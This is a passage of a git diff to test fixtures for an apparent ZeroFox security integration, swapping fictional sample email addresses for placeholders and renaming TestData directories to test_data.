 "image": "https://cdn.zerofox.com/media/entityimages/23b9551f-2bb.png",
 "organization": "",
 "labels": [
@@ -179,7 +179,7 @@
 {
 "id": 6969249,
 "name": "Peter Parker",
- "email_address": "pparker@stark.com",
+ "email_address": "some_email_address",
 "image": "https://cdn.zerofox.com/media/entityimages/kv7b3f5ubcp9s79zigjegevdri4o274mu05h6d7ufijgsvr3pp8aiwalihnuvbi4.jpg",
 "organization": "",
 "labels": [],
@@ -220,7 +220,7 @@
 {
 "id": 560636,
 "name": "Stark Aviation",
- "email_address": "bookings@starkair.com",
+ "email_address": "some_email_address",
 "image": "https://cdn.zerofox.com/media/entityimages/f5544e89-d2f.jpg",
 "organization": "",
 "labels": [
diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entities_no_records.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entities_no_records.json
similarity index 100%
rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entities_no_records.json
rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entities_no_records.json
diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entity_types_10_records.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entity_types_10_records.json
similarity index 100%
rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entity_types_10_records.json
rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entity_types_10_records.json
diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entity_types_no_records.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entity_types_no_records.json
similarity index 100%
rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entity_types_no_records.json
rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entity_types_no_records.json
diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/policies/policy_types_13_records.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/policies/policy_types_13_records.json
similarity index 100%
rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/policies/policy_types_13_records.json
rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/policies/policy_types_13_records.json
diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/policies/policy_types_no_records.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/policies/policy_types_no_records.json
similarity index 100%
rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/policies/policy_types_no_records.json
rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/policies/policy_types_no_records.json